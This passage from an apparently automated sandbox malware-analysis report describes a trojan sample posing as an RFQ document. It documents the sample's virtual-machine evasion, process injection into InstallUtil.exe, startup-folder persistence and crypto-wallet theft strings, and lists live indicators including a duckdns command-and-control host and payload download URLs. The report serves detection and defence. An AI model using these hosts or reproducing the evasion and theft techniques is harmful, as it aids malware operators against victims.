              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: RFQ-12202430_ACD_Group.pif.exe PID: 7544, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: AuditFlags.exe PID: 7992, type: MEMORYSTR
              Queries memory information (via WMI often done to detect virtual machines)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
              Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1465657155.0000000003057000.00000004.00000800.00020000.00000000.sdmp, AuditFlags.exe, 00000005.00000002.1622157833.0000000002967000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeMemory allocated: 1630000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeMemory allocated: 3010000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeMemory allocated: 1630000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: D50000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2940000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeMemory allocated: F10000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeMemory allocated: 2920000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeMemory allocated: 4920000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2AA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F98EE8 sgdt fword ptr [esi]5_2_05F98EE8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5711Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7792Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7820Thread sleep count: 33 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7820Thread sleep time: -30437127721620741s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7828Thread sleep count: 4094 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7840Thread sleep count: 5711 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8092Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: AuditFlags.exe, 00000005.00000002.1620064041.0000000000B42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
              Source: AuditFlags.exe, 00000005.00000002.1622157833.0000000002967000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
              Source: InstallUtil.exe, 00000002.00000002.3880099282.0000000005220000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3880628195.00000000052FC000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3880628195.00000000052E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: AuditFlags.exe, 00000005.00000002.1622157833.0000000002967000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1464168133.0000000001153000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 472000Jump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 474000Jump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 693008Jump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 472000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 474000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: A91008Jump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\AuditFlags.exe "C:\Users\user\AppData\Roaming\AuditFlags.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: InstallUtil.exe, 00000002.00000002.3871748877.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3871748877.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3871748877.0000000002D62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: InstallUtil.exe, 00000002.00000002.3871748877.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3871748877.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3871748877.0000000002D62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager*
              Source: InstallUtil.exe, 00000002.00000002.3871748877.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3871748877.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3871748877.0000000002D62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeQueries volume information: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeQueries volume information: C:\Users\user\AppData\Roaming\AuditFlags.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: InstallUtil.exe, 00000002.00000002.3868130294.0000000000B46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tibnejdfjmmkpcnlpebklmnkoeoihofecuTronLinkvnkbihfbeogaeaoehlefnkodbefgpgknnwMetaMaskxfhbohimaelbohpjbbldcngcnapndodjpyBinance Chain Walletzffnbelfdoeiohenkjibnmadjiehjhajb{Yoroi|cjelfplplebdjjenllpjcblmjkfcffne}Jaxx Liberty~fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: InstallUtil.exe, 00000002.00000002.3880099282.0000000005220000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: InstallUtil.exe, 00000002.00000002.3871748877.0000000002B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3
              Source: InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1478288799.0000000006110000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
              Tries to harvest and steal Bitcoin Wallet information
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
              Source: Yara matchFile source: 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7676, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8072, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting              		Valid Accounts321
              Windows Management Instrumentation              		111
              Scripting              		212
              Process Injection              		1
              Masquerading              		OS Credential Dumping631
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              Registry Run Keys / Startup Folder              		2
              Registry Run Keys / Startup Folder              		1
              Disable or Modify Tools              		LSASS Memory2
              Process Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading              		1
              DLL Side-Loading              		351
              Virtualization/Sandbox Evasion              		Security Account Manager351
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook212
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging13
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials213
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586919 Sample: RFQ-12202430_ACD_Group.pif.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 29 pureeratee.duckdns.org 2->29 31 www.chirreeirl.com 2->31 33 chirreeirl.com 2->33 55 Suricata IDS alerts for network traffic 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 Multi AV Scanner detection for submitted file 2->59 63 7 other signatures 2->63 8 RFQ-12202430_ACD_Group.pif.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 61 Uses dynamic DNS services 29->61 process4 dnsIp5 35 chirreeirl.com 209.58.149.225, 443, 49706, 49711 LEASEWEB-USA-DAL-10US United States 8->35 23 C:\Users\user\AppData\...\AuditFlags.exe, PE32 8->23 dropped 25 C:\Users\user\AppData\...\AuditFlags.vbs, ASCII 8->25 dropped 27 C:\Users\...\AuditFlags.exe:Zone.Identifier, ASCII 8->27 dropped 65 Found many strings related to Crypto-Wallets (likely being stolen) 8->65 67 Drops VBS files to the startup folder 8->67 69 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->69 73 2 other signatures 8->73 15 InstallUtil.exe 2 8->15         started        71 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->71 19 AuditFlags.exe 14 2 13->19         started        file6 signatures7 process8 dnsIp9 37 pureeratee.duckdns.org 193.187.91.218, 49707, 50787 OBE-EUROPEObenetworkEuropeSE Sweden 15->37 39 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 15->39 41 Found many strings related to Crypto-Wallets (likely being stolen) 15->41 43 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 15->43 51 3 other signatures 15->51 45 Antivirus detection for dropped file 19->45 47 Multi AV Scanner detection for dropped file 19->47 49 Machine Learning detection for dropped file 19->49 53 2 other signatures 19->53 21 InstallUtil.exe 3 19->21         started        signatures10 process11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              RFQ-12202430_ACD_Group.pif.exe61%ReversingLabsWin32.Trojan.Leonem
              RFQ-12202430_ACD_Group.pif.exe100%AviraHEUR/AGEN.1308645
              RFQ-12202430_ACD_Group.pif.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\AuditFlags.exe100%AviraHEUR/AGEN.1308645
              C:\Users\user\AppData\Roaming\AuditFlags.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\AuditFlags.exe61%ReversingLabsWin32.Trojan.Leonem

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://www.chirreeirl.com0%Avira URL Cloudsafe
              https://www.chirreeirl.com/wp-panel/uploads/Mqdwogssw.vdf0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              pureeratee.duckdns.org
              		193.187.91.218
              		truetrue
                		unknown
                chirreeirl.com
                		209.58.149.225
                		truefalse
                  		unknown
                  www.chirreeirl.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://www.chirreeirl.com/wp-panel/uploads/Mqdwogssw.vdffalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://github.com/mgravell/protobuf-netiRFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmpfalse
                      		high
                      https://stackoverflow.com/q/14436606/23354RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmp, RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1465657155.0000000003057000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, AuditFlags.exe, 00000005.00000002.1622157833.0000000002967000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/mgravell/protobuf-netJRFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmpfalse
                          		high
                          https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dllInstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://stackoverflow.com/q/2152978/23354rCannotInstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://stackoverflow.com/q/11564914/23354;RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/2152978/23354RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		high
                                  https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exeInstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
